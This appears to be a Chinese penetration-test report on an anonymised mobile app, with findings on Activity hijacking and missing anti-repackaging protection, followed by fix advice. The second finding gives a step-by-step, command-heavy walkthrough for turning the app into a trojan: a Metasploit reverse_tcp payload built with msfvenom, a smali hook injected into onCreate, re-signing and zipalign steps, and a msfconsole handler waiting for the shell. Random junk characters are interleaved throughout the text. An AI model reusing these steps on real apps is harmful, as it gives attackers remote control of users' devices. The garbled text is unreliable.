# q; u" v; E0 f+ E. z1 ^
3 j% ~: P4 v) h
: f4 G( [+ @6 c* n5 e9 s' Q
2 J" P o; G8 \; H
- @. Z0 _' a% s, `
' T7 p H% l& }/ h" M$ Z
, s8 L; U, R; } ~; d8 F/ u
1 u: }" v6 T/ f! K+ W! J : k& f/ U% C) h" X" d
* Y- W. t! H0 X 表1-2 测试结果 + e, D$ j0 R1 R* _1 N. K8 D
5 J5 b4 P0 y) d, p
& R& j" A; ]- p* p8 W4 r' X- f+ N1 V* f! h- r+ { Z9 b: M
* B& I7 n, ]# A& `0 J. T
7 Y& r; m* |# ` ^
) P5 {. J* D J0 t9 g
5 i# f8 `: H' N4 C
( M5 b! j, }) T B4 F. b5 S
* `! o/ O) C4 a& g/ v
/ d* {; g$ q% H$ N0 t1 H, l) [; o/ Q
2 检测结果 . E- |# K3 k, W( V6 {
$ c: d1 n0 s' ?
/ i# J5 a/ E, u7 ]; | [! B
& O; ~ d3 D3 H3 `; _
5 A4 ^5 t0 T4 F8 }
& U8 K v8 P7 k9 _; l' N 2.1 某某某
w9 B- I- E9 }
0 @% p! [% a# T7 c5 q
( X: s9 U6 v6 D
' u- Y* W' ]6 K8 \. T" w8 E* g
9 R. a- Q4 M, l
! S, |% j- t% {8 o9 Y; I% y& g 2.1.1检测目标 ) `- H4 @! x. T+ z4 @& o8 z! A7 G
, U8 g0 ~$ b2 F( G
& i3 W) P* K! A! Q) r5 D" p( G
1 g+ T. t1 K7 @: H4 [, H! b& z5 S8 `
; W2 b" `( V% f& w
% E9 R1 w* ]4 q; J7 g! @. y 目标地址: 某某某某某某APP
6 _ d. J; Y, R* N h; Z1 x! \0 R1 R6 r! Z* |
% \# q. _( r. @0 E& X+ m
3 ]3 [7 `+ l4 y5 W% ?- b
3 ?+ m- H, ?- k
# w0 a6 m% x' t/ @: S" T 2.1.2检测结果
; H4 b" X1 @7 x2 Q
+ a$ a J# |, g! O- U' ^& h/ r( I# |
! t9 J# n0 f6 T* W( M2 X7 M9 l( }" H+ D+ H s
& y3 e2 q; m1 a& s ^
3 O, ~2 n6 ]( w7 z4 p 2.1.2.1
: \3 v4 F( V' f3 h' C8 V. p/ g7 p# c) _4 r, z1 ?/ k1 G0 k
1 t% k3 T( B4 e' P$ s3 [% m( L% P. ^; J0 l+ i, U
* H) G! B4 \; ~; j: R
; D6 T1 _# y8 d) [. f9 }
漏洞链接地址:某某某某某某APP
; ~7 [9 c) L# Y8 y: L
) n' I% H- U% I Q6 c
* c* N0 B1 [' \, |* E
1 P+ p; S* ~3 h$ y7 s: u) E
$ E* p5 S( u W D, n \" m
9 d9 c5 ~# J6 X. e# ]) G
0 _/ b. U+ n6 ~1 h
. V# q0 H: R# `/ a7 M8 U
8 h' v$ k: v2 m) D' V( ]
9 }" V D( F* x' ]
1 O* l0 J5 E# {$ }! K- r
3 m7 r5 w U- d- L+ s8 n 漏洞分析及取证: ' Y8 L/ |' L0 n0 U
5 @: D" w, y; B2 |
5 h% f# K& z8 Y
- W6 C! X4 V& y4 W " I' ]6 m7 \% ]3 e, f: }
0 v4 n# t( l g7 ^3 Q; \2 z; T( X 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: * s& Q. e: ?+ Y# ~9 K7 F2 M- Q( X
4 g7 c- y0 ]) F# j) F
9 O3 u; @4 ~% t8 }% C0 p( W2 O6 @, d6 ^/ e& C( n
4 G4 |8 j, [7 Z2 J4 [2 Z
2 z* T7 {7 m- O6 `0 D) b
5 i4 x6 d9 p7 M0 M! p- t& _# H
: \: B3 G$ P% [6 u4 y' a
+ I; l- u, G7 U) L$ T
* c8 |8 ~$ ]3 @
5 V: D! F$ W. o3 A! M( d
" @; R |) e4 ?6 |# @: U$ v. i
- k% o- p0 x+ v" }. U- L: Y+ q
! o8 u. Y9 ~5 E: C
1 X- K- K) ~# O3 G, {2 K: c/ l- N' w" O5 e
% r: c f+ R$ {. V( G$ O2 Q/ x" k' x8 i) L
; c8 I7 B( a+ X. f; \( G" D) h
7 w* y3 K* C( n; }; Z \
: c0 |( a S. q8 f3 ?3 s; `* ^
& R5 z Q" s) V% S, J9 O" S- a
$ h4 F2 m; m! p7 B 4 _- c' D: U% O5 D
: {4 J0 T- b; k4 [5 V
; W% b% Q4 p& D' @0 C6 S I/ X5 [8 B# e
; l/ \. ?; x: Y8 t3 Z
0 p4 `( k' m* J/ S6 q( K
8 U3 Z! @5 m) \0 i# u: s. f 1 h) S. H" G" k
' P% B! g* F0 M$ r8 t) M3 J
8 f& X2 U, X" x: X; y# O
1 u/ e4 {! o" a- S( F$ o; C& Q
5 N" D4 ^8 o+ _" `' |
' J! U4 l# A) m3 ~5 y 1 b( S- D* H4 W3 j; D9 \3 u
. Z9 ~( q1 A& Z7 I8 g1 p) j! `) F 漏洞危害:高 * v' n1 U. c N+ {7 M. b
3 ]. g& G& p" X7 I! r0 L% c( l" p2 u
) L6 |9 J1 z1 b2 u/ W" g8 A
" h$ X* q: P; v ! C: V% h8 r5 {5 G5 f7 d0 B2 v
`' B9 y) S- u : I& T! N5 g5 w! s3 V4 V1 | C
$ Y- |+ Q" U$ T) F. W" E+ [
# m! t' g3 D2 {) @9 _
3 k5 z% o3 t. D, D; g0 `: T
/ d% Q; p4 p0 `) z6 ~) t1 B' F, ~! n' P4 @5 y
|
/ T6 q: P! q) i: S2 p6 O
& A/ u+ J y8 A+ F4 o" Y) f3 k
% b( _: C! T4 G8 c5 G; K
0 U n8 j; E9 x/ i 严重程度 ' |" h J' h; `
+ R6 b9 z5 {( X& V! }) q. Z3 M8 \0 o
$ |7 Y: C+ g) {' o' D( M
( w* F* e# s7 z; t0 E |
% i. v& W5 @ r5 L5 k/ F B& q
' W: I2 U! Y' q' p/ a
6 C- b& H8 ^1 P8 a$ O. P* j' _( u" Q9 H- ^) Q) s' I6 ]
5 Q& r* z7 J8 z
0 n. Z) d0 j- z) c8 c 高
+ r, G% l7 n0 z/ I: e
& w- s! S( Z9 J- l% d
: p( c" K$ X0 y" o& L. [4 A$ Y* |+ e" G) G7 z1 R6 C' ^2 e% V
|
, |& m; N& k) t2 M# ~2 i3 u" W) g) d2 v
3 o% ~5 ?% Y! l( i) o% s+ Z1 ~2 o/ N3 a0 I" {) i# K: V8 e6 \
" y. T+ N: M% }5 E- d
7 y/ H& m" x$ Z ■ " ^) a) |) y6 v6 Y
. T: }2 W& y0 W/ q
' l# V: T w0 Q7 [: h! f! X; Y
0 }. m9 j( x3 ~0 h | 9 e# ]0 Y, T/ A; \2 z+ u
h! ?; I" d. A& N
+ d/ L5 ?" F! S( n+ H
6 s5 |9 D, X4 K0 q* l* P6 B- {
) m. ^6 X& v, Q3 W" P2 g4 B, U' B3 [
中
7 s9 @6 D" T, |: `7 C4 C$ t
2 q' F* ?9 @+ _" q0 ^
: M6 A; N) D0 }) n6 y3 z9 `, M( j5 O
| / T/ c( G2 X& U- U' n, h
/ M4 m8 A# [# s- l: S& O
# O/ D+ I3 ]! F9 I' }; T. A
2 S4 A3 N! `" g. y
2 b s6 Y. x* d& |& w9 q! y
1 @8 f( M; g( M: m/ l
5 D6 m" C3 }6 r+ V+ }& Z. C+ b5 Y4 X, |8 ?) g! o, L
& N8 h+ D1 k- D1 p9 E. {% m4 b# G2 g8 G
|
3 ]$ ?3 a: l/ s H% F! R4 N5 U) q1 ?3 i2 W- M
+ P2 s, \ L6 T9 b9 @# ^$ N
1 X6 n, Z6 u9 X3 p1 ]4 h) e
2 J$ ^# U3 v( F: h0 T+ D/ w" P
0 a5 p4 @6 B* B- C' f 低 3 i5 u9 Z* Z) p
1 P, u! K: e) ?6 x4 m
8 o0 F* z$ h5 A K; C; ]# o
4 l8 Q5 m; V7 O | 1 A: R. {4 |; g
7 T; Z# M; v9 C; _! j
! ~1 v. Q/ L/ Z9 |' _0 J2 |6 \& A
: S9 D5 i# w" f4 ]2 v ' [' k5 t0 r: |: V$ D. N5 Q6 K
2 y2 x- K8 @# e7 K; L% R* l- o6 r9 p 5 m" q O+ f0 Z; {6 V7 ~3 s9 S
; U s V1 k1 Z
, ]. R2 G6 a: r6 S0 b$ [' `: |: `7 Y Q0 K
| 2 l) t1 _+ ?3 O `, Q- Q( }
8 `" A" P( n& v' }# L
+ f/ ]5 g+ d( k9 x" A# l; Q, G0 G+ V6 a. i
) F7 p' C' I8 ^
) F) M3 N* W! p5 a; Q6 k
- s" R! {9 H2 K( p6 t4 s
" g7 A% D- n4 b5 _, _' H) s; ] , {$ L) J$ J9 F) k: G f* f/ a3 N
/ M% c9 S4 \! G+ C: i- [' ~+ Y
. V0 s$ H/ N- a4 n
0 h- l* Z5 m: e- t4 `; V
[% j3 y/ d, L; s
" }, n2 ?$ V. G7 q; B% i
8 l$ x; Q/ P+ J$ f1 }8 i8 x% Q; ?& [8 z# u8 w& f
& Q8 a- Z! ^" R/ G4 n5 m
! Y/ p. _; Y+ e( M! w* S& P* v 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 4 k T+ x2 a, z$ a n
9 h. X6 }! s& T9 y1 {: {
7 \# `5 D+ s; s* E/ K
& ^3 t ?2 ?- v3 Y$ _: t( S * u4 F3 K. O, o: s+ H5 h
& F/ ?$ M. X; C1 \, x0 m
' W5 r9 L: g; X2 x
0 @% ~1 V1 V$ ]5 J' e; `
# M/ Z, K; t8 J# \9 n' ?, q) \( J0 M1 Y5 ^1 W, N
+ l& x" I* ?. o" v
; a) a/ O/ t) w+ }8 ^
" M& h( t K1 ]+ S: p
6 @9 c, c. v+ r3 _( t" t8 S# B
+ i% g) D: M( V/ I" ]- C# x- D: n3 d
) N5 A! y! Q8 }3 P6 e Y
2 s# x* ^7 b# i3 a; T
, T( ]' c$ G2 F 2.1.2.2
& u) ?! i! d( l& d5 v: I/ d: g2 S( q2 f8 O( [$ f5 f) R
$ i3 y1 x' k. B% |- k2 c
1 z, ^1 T4 T9 _
6 J; A/ F7 u5 w5 Z
0 A9 C: T# S I( @ 漏洞链接地址:某某某某某某APP
f$ a( m$ l; {9 X( F9 J: ~, Y7 w/ m- @
! Y! J5 n: F @+ S. \; i4 J r- F' |
0 }5 g7 I0 ~+ H6 ^* ]
# Z8 c% g' c3 B0 }, ], Q* f$ F% P! J0 p5 i5 X" f
漏洞分析及取证:
# ]1 d. j! U7 T" F3 D
5 x' A$ f- x( \, ^2 n
. H/ s3 f5 \! e- [+ n. u7 X( h" ?; g8 k, w. g
$ H3 l, L6 G$ p R+ a
! r6 K6 w4 h0 Q( V/ ?
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
& [; G2 H1 x% P1 K9 {1 `- C) p9 B4 \' t& w) \9 D' n$ [) T# B7 s
2 d; k1 F- A; o. C: K
0 A- b% C* v3 y! z' H- g- ] : O2 l2 N! @. n" ?3 Z
6 k2 i0 S! d ? 用Metasploit 生成木马 apk
' W& M! n7 B" |# Q& Y/ _
: |! ?7 p$ P( O \
6 M4 u \. [3 ]- X
. P" _; g0 m) A$ a1 h2 h( G: f$ ] 9 U \ A$ J1 X3 m3 S6 f8 L
~' n, Y6 r# v0 h5 u3 p! u! E. Y5 p msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk : J0 B1 }. C5 r& g3 M( V9 ~
' V! s7 f& l. [) M( H
3 `/ \/ a* @1 Y# N' t. D1 \$ x, S( |0 I- i! p4 f e1 t& }
5 X7 o4 ]( m V8 G0 ?( X
; p8 F8 }0 D. S5 N
反编译目标apk和木马apk
$ k; U9 j2 L" }0 E: a! h
- u7 a c- y. C! i8 c5 H
: A" A; Q3 n# A: v4 H, B) `$ i" q& a
3 \8 v4 c! `, k* ~& G2 a- S
' v( J7 k" \3 J apktool d target.apk
2 m; L) G) j+ l0 d. G# ~% |; ?& c; _/ ^. S0 K
apktool d cockhorse.apk
5 i3 D) j9 b4 ^) t+ X; I; {5 ?* [, S6 x" o" M
7 u" I7 y9 u" \; y) I+ P, E
) X0 C8 Z& ~8 } |. Y! {2 j) R) v
0 M% N0 o2 w' x0 s1 W3 R! V# V/ l* ~- f, \& j: U. w, }
木马 apk 注入目标 apk
6 ]$ ]1 Q1 }! z9 T
7 E' X; L9 _* Z8 s
^! d) P4 _. i4 [& P/ K" m( E
+ Q7 ]% }& ~2 N% \: u- g! |0 Z
% }: M7 U2 i6 ]2 G/ N' ^
! @# B$ P6 H. |. a
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
& U# p6 w! |" } Q
1 d: }7 s" H$ m4 j* I invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
" [! K$ L) s! `/ l& l; ^
G9 w7 P* d4 X$ D6 h& }9 w8 w) k1 T
- s& K5 w( [, d8 w6 ~2 h2 |: i
1 A- N9 o" M+ Y8 |: ~
" K8 o' Z0 `4 a; I% l, o0 M8 g/ n. P2 l0 @' J/ Z M
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
: Z3 u5 G/ I/ P9 m5 i$ p
, W3 H+ O+ K# k. Y0 N+ i4 S
* o3 @; o" [1 q6 ~: G$ u( v. X( L
& |+ L3 |; r/ l; s; r
1 x. X( w# I8 o9 F- B# F
+ H5 r6 C/ d/ o. C/ P; P# I
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
- p& }+ g4 ~$ |1 e5 z
* |7 g3 Q) ]' G- G' U4 N& u
! Q& o9 z& L, m. D& ]1 a" W# m
1 D- Q `6 B; d$ z6 H9 |
: \9 h9 X$ V: ^+ Y8 F
* H |8 D; m( F 回编译生成最终 apk ) m, t# l& o0 t/ J: u. F7 H
: g! q4 U1 I; s6 ]6 R
$ I# b' ]6 j" \5 \+ k# j% L
: ?# ~+ P. i# C+ f" E$ [4 R
8 e) o& P, P) Y1 J: s+ S9 a& R! f- Y9 f3 ~1 L, H; U0 v% g4 N
重新打包
7 }. t; \1 h% J! e8 _
1 w Y7 K0 D1 `3 k! ?
' }* I7 _% X: B7 B C/ m8 v% }
" t' O+ c/ g( b9 d' \
8 d2 U3 M2 ~; j9 J+ U
$ |5 i4 p& M; ]# c C' d apktool b -o repackage.apk target_app_floder $ ~/ h. B) n# x. e! `
0 b4 x' b, U, u+ s4 [' n$ e( {+ z
, t6 [1 e6 M/ W5 R X& }5 O9 a) L# ?4 j( ^2 l7 |" i8 u4 P- \
4 F% o5 h( D) t$ a
6 H ]; `; t3 ?0 n 创建签名文件,有的话可忽略此步骤 5 ^5 Y4 v3 v1 K& m/ c
! `2 m5 U5 m: f5 z5 z1 V ~
8 l0 F5 O, ?- F! V7 G; G( o* t- f- L1 D# _
2 u l- R4 w. b; d/ _3 X8 v
% P6 _0 g6 X8 ?) ^/ h* k6 [% { keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
' v4 Z3 L: F6 }! \% V- I5 v% V3 ~7 \
$ v, L# E( @- `
) O9 ?% w1 G& s q
6 L* b: }2 {9 `: ]/ d. A
( O3 R" B& ^7 ^: O- a9 N 签名,以下任选其一 $ M! w# ?8 W# U! B" x7 s( q
+ ~. u6 N! r$ J- Y( M% \1 J
& F0 b$ {! B' |2 |- {' k6 z2 Z* V& o+ m
b& s" ~1 m6 u# X4 u+ m0 S
8 { H- e# K% b8 E7 u/ a
jarsigner 方式
: H$ I$ @1 ^! [ S' r
- Q1 |. V0 ~* x1 ^! q
& v2 L/ S9 n, Q; s7 o; I. [- P
# ^* ]( ~8 P' Y+ h" S6 T" Y5 t 7 b# o5 s7 N9 u7 n9 a5 {5 _
1 u# C: z' E- p8 v0 E; s' N6 t; T
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname , ]5 g' a! B( @9 \- z0 |
0 |# g. l( N2 i" Y' y) G a
( v! A4 {. {- B. b
; y* P$ f# l9 L9 Y- S* k
$ A# i6 U% e7 n+ H4 J' Q4 p
& M7 |; K% A" J; w+ w apksigner 方式 7 G1 s9 E$ l! H8 B
6 u) s- f x: r1 z _
" Y1 J) s( l2 R; V! X5 n3 {0 b/ I/ ]
: @- e, X: U1 _+ K* K & l7 C" _7 e4 u
$ {! d C* y7 n* E8 k: _% q apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
4 L9 y: w5 A Q! M9 c0 ], Z0 M! o% W W
- I" }+ U& I1 {$ G1 {( `
% c2 S) i( W. d. ]& t! Y 1 ~! n1 I, u W$ L& |2 D
3 S! g% V$ B# Z8 E! P9 \1 Q 如需要禁用 v2签名 添加选项--v2-signing-enabled false 2 x0 U% A+ P4 Y4 `
2 r, A" x1 E0 V: I
* `& e; Z% Z/ Y! O+ U p! E4 l" u
7 B6 j1 E$ B3 H6 g7 s0 i/ \" D% r
验证,以下任选其一 4 n3 k7 L7 x9 \- G
% m8 |6 j9 H! i! L. b5 d
3 t) F; `7 @. Y# N
; Z7 C3 S4 f: q6 J$ c
! V* a, K7 Q+ `' s/ }% L8 E- Q& _" _' f. C- W
jarsigner方式 ' F7 P8 `0 e$ F! K
& o6 U! K* S1 Y% x: F
4 g3 E* c1 v+ l( ]
( C. s3 g% }. y, E
+ `' W8 |4 B: s
+ M! \( b9 f( b- ~ jarsigner -verify repackaged.apk 4 s D; [: M* l$ R
: J: n7 f! m' O( N
( E( l! ~5 \6 y( R- J3 |% T. Q' n
, z/ }6 k) n! ?6 a* ~ c- @! ~
8 `$ k; D% e0 a
$ j% Y) a3 F' {% G1 G0 A. h$ k1 w3 Y apksigner 方式 5 X3 p0 X- m% c8 _& Q2 B
" C# c' `3 Q3 C# C" ^# J! o! u. q
# V: V. z9 O" F, O5 Q$ v7 o. j& D
8 Y+ {: [2 w, T7 V' t, g; G 1 R- |6 G9 t% A G
( R3 L9 }5 B6 k
apksigner verify -v --print-certs repackaged.apk
% a, |4 X" j* k! E" M
% W9 }2 A7 t; \: ~) J
# J, h+ g0 G h1 N/ @3 s( r) t. @
$ ] j2 {0 f# B" R
: \1 n5 r+ ^ h' A: S
. [4 C8 H' S& {: h
keytool方式 1 ? z. z4 v' }% Q' B1 M/ t. H
/ @# K$ X/ ], a( P& ?
]" p+ f( R5 e& o2 J" ]- _
( n4 l3 ]; n; A! k
8 S8 H5 p. }* h( m1 ?" P9 b
0 e0 M" o4 `0 {9 g4 P7 h keytool -printcert -jarfile repackaged.apk
, t, m8 n8 t4 J B0 G( \7 U7 r5 S, n% _5 u
8 y, e* a5 Y' s2 ]2 b: |3 v8 y
/ Y8 L g1 }" \9 Y
; [* g: ^% C0 }9 ?, R, t/ a' N; ?* U7 e9 Q, W& Z1 |) F
对齐
4 B, _; U, P# o2 C; N. m9 q* B4 U" |$ T7 X
0 z6 n. [$ |! u# R, E _$ u; G) V
& |/ c X1 U3 v) ~. |+ X
+ H6 _% O9 I% V& Z) O- t
7 D/ S: t' ^# w4 T 字节对齐优化 7 p2 s. i3 u3 `/ I5 C6 R$ N
" ^( }: N; P* U8 H% a
' l2 c, N0 ^. {4 m+ G) Z- z
W$ N. m& d. O C& [5 I9 P6 t 3 @" b# l! B% m1 ?
' x5 F4 m! ]" B7 q4 e0 z2 i zipalign -v 4 repackaged.apk final.apk
7 q( p% V9 g% g6 G& r4 z; A: R7 a5 W
# q0 Z0 D# i. U! c$ `6 J d) t4 r/ L
3 E% S }8 E- q ^4 ~3 X8 w! i% C' W( b
检查是否对齐
, p( g1 ^( K7 f2 F
) o1 B3 @( ]: p+ A- c5 y
9 u0 r( o$ ~ P7 L% V
! n7 \- H5 l# `- ~9 u' A9 w# L
5 |) N. e% \$ Z8 R5 ~
: d2 Y. {, E7 N1 ^5 f0 n
zipalign -c -v 4 final.apk ! q; w/ _, q q* K3 e' ]# N
4 k7 O. Q B( r
) W: f: W9 D0 `# K% e. U1 X. y; }' |! e9 X3 Q' V3 r
- z( n: d+ v0 Q4 _/ f5 D
7 E" t' @2 B& x3 }& ? 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
( c; X- S4 Y! m. U$ _4 g) d6 e* i! P# C( W5 i+ a2 T# N4 ^
: ~) Q8 t0 c0 G- Q
1 a9 |# N$ d% G 2 n j/ B! N5 @( S' `% t: W
! r" [7 Z2 N9 h! y- W
启动Metasploit控制台,配置参数等待上线
' c# j5 @* d( y; ]; m% W+ E7 N# d! }* x M: j' x) n
$ H2 o$ m6 W; A8 X
3 P5 x& J* { Y+ w2 C
0 A1 X* D# w& G0 d/ j+ e- a y6 o# g8 x, E/ o2 r2 v6 }
在终端依次输入如下命令 5 H, a+ G% k7 J, p
2 e1 u: W* l. W
3 y% q2 m( J5 `' `: c( {1 y" N2 b! w6 A4 J/ b
' t8 x9 B0 q: q' R1 n4 m2 L _( b; ?- e. [& o6 U2 m# }7 n
msfconsole 4 ]6 g4 _- }8 E q1 b8 S
2 l1 Z7 ?" m! D$ X1 U
" e; ?& v- H6 j# E, m
, s8 {" L+ M5 p+ q' j6 U
- B/ |6 D$ z; e* k0 ]& i; R' Q9 Z
: M% F. s! `; E- E/ \% | use exploit/multi/handler - @% u4 P# d! l4 R1 n) y
' _* e: U# {+ ^4 p8 s6 w8 i7 k' y# B* x
* y* ]4 k3 p% M0 C: I) K
% c& [7 A( }) r1 Y# z + X( i3 \. @- f }% L4 z
% x7 K0 H- g+ e# \
set PAYLOAD android/meterpreter/reverse_tcp
# D7 v# P$ R+ y5 ]' Q" p3 C8 {- ?# [. |* J( A
" v1 c' T! V; G& V! u
) w! W$ G+ U% d! p) \, E% ~
; @3 P5 B) H$ j" x# C
7 r+ e( F; C- ]) Q set LHOST 192.xxx.xx.xx & s9 v4 p- T( ]0 v4 b
1 |9 z! J; ]& P
, G [) G" c7 n; Q* j9 T* }
, C* p' D1 g- b2 A# |
- E0 u! g0 b3 P$ a8 D8 f
4 `0 D5 j. s9 t3 X! l* r9 F1 h set LPORT 4444 # Y* n& y3 L% c# d6 ?8 h- j
: A: b' p( R* y
- F$ D& n9 d: D5 R) g8 |' A4 H$ M+ `1 [' T. E' v. v$ ^# c
+ _" C7 ]6 L2 g' K' Y# u- a/ K3 t) z/ V' j
exploit q1 y- m! U$ H
3 y/ b& F# _- {" W" a& A( S
. x* \+ Q' h7 l2 z/ _- o; I
! \: g, L, X1 D/ I+ X1 b; j5 A
2 n }8 K5 w- Z3 t m1 ?3 u' i0 Q2 ~, V7 b% Q& W: ]
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
4 t9 y5 o4 F n8 Q: Y( k1 z* v9 r
2 f6 o$ W& |; G
. _4 k' f+ e& E2 v0 Q$ d+ i, P/ J3 Q5 ?
- A$ T, S5 M0 u1 C6 w6 i" |( z
. l# H9 s C; B [4 {+ K5 R; i# m 漏洞危害:中
" `( ~- s. U) x b; m% U2 C: ?/ p; P; m: w% Z' Q2 q! \1 p
' S$ ?5 \: l- C0 R- F
6 |$ w" l* l, Q6 c7 |
; ~+ V. v4 S3 M5 ]5 l
' E% a0 Q! m' f
2 r. K0 J: u, w. J" X; V8 X( z' J' c( i7 A( ?( ]/ O& l3 @0 ^
3 b9 `' o! s6 v4 V- ?' ^5 i% ?
. x6 j( U- @0 S3 K. P( I 1 J# D4 ?5 y, f: a5 z3 L
/ F3 F& |% u+ B5 } 7 i4 t) S3 ? O) L% P% c5 T7 _
# a0 V' D1 H0 b8 ~ | ; U, K d' c+ s' h
6 W* h1 b5 F) [* z: W+ i
4 u# u" G4 `! Y3 q$ j$ o
) S6 @+ y$ ?3 D" w4 B1 s 严重程度 ; M) q; C$ x* \ I9 y3 a% ~' \
; U" g- s4 Y+ U+ ~' |: B 0 n* D8 j5 l& P
; d7 W7 Q3 F: Y( L
|
7 z; {0 ^" u @
9 x, L: @( j1 z ! ]1 _ ]. q; g( g: ?" {( {9 g
% X* w. L" k3 D5 {; X5 [
" h9 [5 L' d2 \3 v: ]7 ^
! ~1 D8 [$ h3 P% D K- H9 @2 @ f
高 ; V+ d0 J7 B7 V) m
1 I' \/ v" Z0 z/ ~1 t3 H! ?* C : k- P5 _" r2 W v( y
( T# i+ S1 ~. ^# ` | & I; c' u: \* f9 i. ?# W l: r
) o3 M5 [* A4 c& l
6 f' j$ o, |1 L1 a. C" N- y5 ?8 b: W: F+ Y
6 N/ w; }7 h0 V3 Z6 s
f4 u) t4 }$ T! h2 H ■
! N+ c+ Q% d$ v* E
3 q, o% q e* _ 7 r1 l: S: b3 d, I! ^
7 b* g2 G+ O* \0 p) D' U2 C
|
0 `/ g6 j3 {( A% Z; Z- W8 R3 @# M2 l. m& r( [, n" V
e9 C7 A l$ v0 b$ f/ @4 k
/ X+ a/ F0 ]$ a) a5 l! D5 L
2 N/ n: @" E6 y6 p( Z3 y+ A) @2 E3 l# i% J
中 . t/ l* i5 j/ v; _
" w% f2 h7 u* p
0 g" D" N( R8 B7 X
1 i; R! c3 x/ V( t
|
. `, q* h) ?5 U& Q8 C1 ]/ P
1 m9 e! M& H/ O6 a' z
+ C' D7 r& y. Z! c5 d9 ]% ^/ c: _! B7 G" v, t6 x/ f
+ m" }; k2 {# ?$ @3 t
% q V! ]/ s# E3 |( U7 H. w! N# B2 R& Y
! c4 e( P5 l: b; M7 f5 W" ]# S$ u! n" H3 C! X
% l( |6 ?( e1 U) c( E5 X4 H+ H! {6 r' ]* P" [2 ^7 W
5 N w( }: i# O6 U' [
/ h$ P a' ] O D | 7 Q9 L0 }# Y& v
. O/ J# V7 \5 I- S3 }8 B( A7 U. u0 n
* P: c, d8 J0 E! f+ C
& Y M1 p& ]4 _6 i0 o6 z! L, j 1 i/ U$ U% W, X D+ w, A
9 P5 O$ N+ J+ P* v$ J: }, M 低 " R+ Z& g7 X7 m0 k5 `' E8 S
; w; Z0 q# ~' G6 Q7 R - {0 Q# G) W: @! R6 h4 U
I" E `) }5 Z- Z) Q, F, m | 4 r+ E0 y1 _8 S$ k
; \8 i" t6 ]6 a1 w* n
0 o8 @; D! h. s8 G( H/ x) C
1 Q) N! e( O8 f* M Q5 M . X3 c4 {, Q9 P
0 ~7 @4 t% Q6 x; Q/ B( N
# z8 t% p; a+ V# j) V
7 s2 m s& b4 s+ J3 h
- k5 \; k/ s% y- H
$ G8 q) n8 [6 D 1 j3 O7 X; {3 W
, c: k$ z. S( h3 j# Y% E$ v" D, W |
4 V, Y9 S) B: I3 u4 p1 s u* S
5 ]/ P; ~) `$ I& d b3 ^
1 V+ K3 i9 R B( Y W p
a- a" B" |; p! @' A, D " ] v* T; K$ l+ u: f
2 J* d2 G6 }) A; s- V" E+ F
) d! Z) O( ]% Q$ ]) T
& S# ~ b) A7 w7 f5 V. |) O# u 4 F/ k N- w- J! \6 o
7 c6 \1 ^6 G, e6 ?* m/ p 8 x1 r1 r; D0 d* {) j
" z; u# X, o2 g+ {
* ~7 B' U; c0 A9 X4 {" k8 H9 ?, C6 N* ], v( T0 v. f: A" N& B
1 ^& u& C% [ O$ y0 F* ^; y" N3 w4 c
# n* Z2 V7 R( m4 z$ @; H) R% x- {" G* m4 B# N7 @( j0 f! Q" e1 l
修复方法:
! W8 P9 x+ W! }( U: ^4 `/ _/ A% _3 f( r0 E* O% ^2 S
$ X; r% a2 A0 r4 c$ p9 L- K" @9 }; ^# q* ^2 E6 [
7 }7 W0 M" t1 K+ Q0 Z6 i+ {7 d( I0 q( @/ Z2 m
1.在 APP 启动时应做签名校验防止二次打包。
# G+ k/ o# u3 A& o% M @4 }2 K A& @% ^1 X
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
' c3 m* ]3 X9 I% O& {/ x6 \9 ?' h1 V/ I# ]. o
* j0 K: |" C" v4 H+ z3 [9 z0 y( d5 m4 z2 C7 u) y) f
! v# ?4 \9 E0 Y" a
0 K! K$ Q+ [4 z! p/ U! `" C
4 {$ ~2 r/ b+ h/ N4 x' Y5 a* b' g2 n7 K p- E
- [- o/ k: y0 f. T1 j0 O8 O
" m. s- ?0 O; T# k! q& m C
v9 C3 U) C. D( k2 e! M0 b$ z. h% T' c5 W( Z. O( ]
. p0 n) |1 y$ a4 O( `8 V
* m/ R0 N1 A$ d$ J$ H
9 `. P0 }& B# t* ~1 Z+ i$ l
! Z+ t i2 t! H% _( f5 d: p
" Z, q, L$ }! k- q" l3 Q5 {* ?& [4 P/ M5 k* H
9 S+ z! O: Q o. ~, I: \. h
; H- X: r% i" L- {* b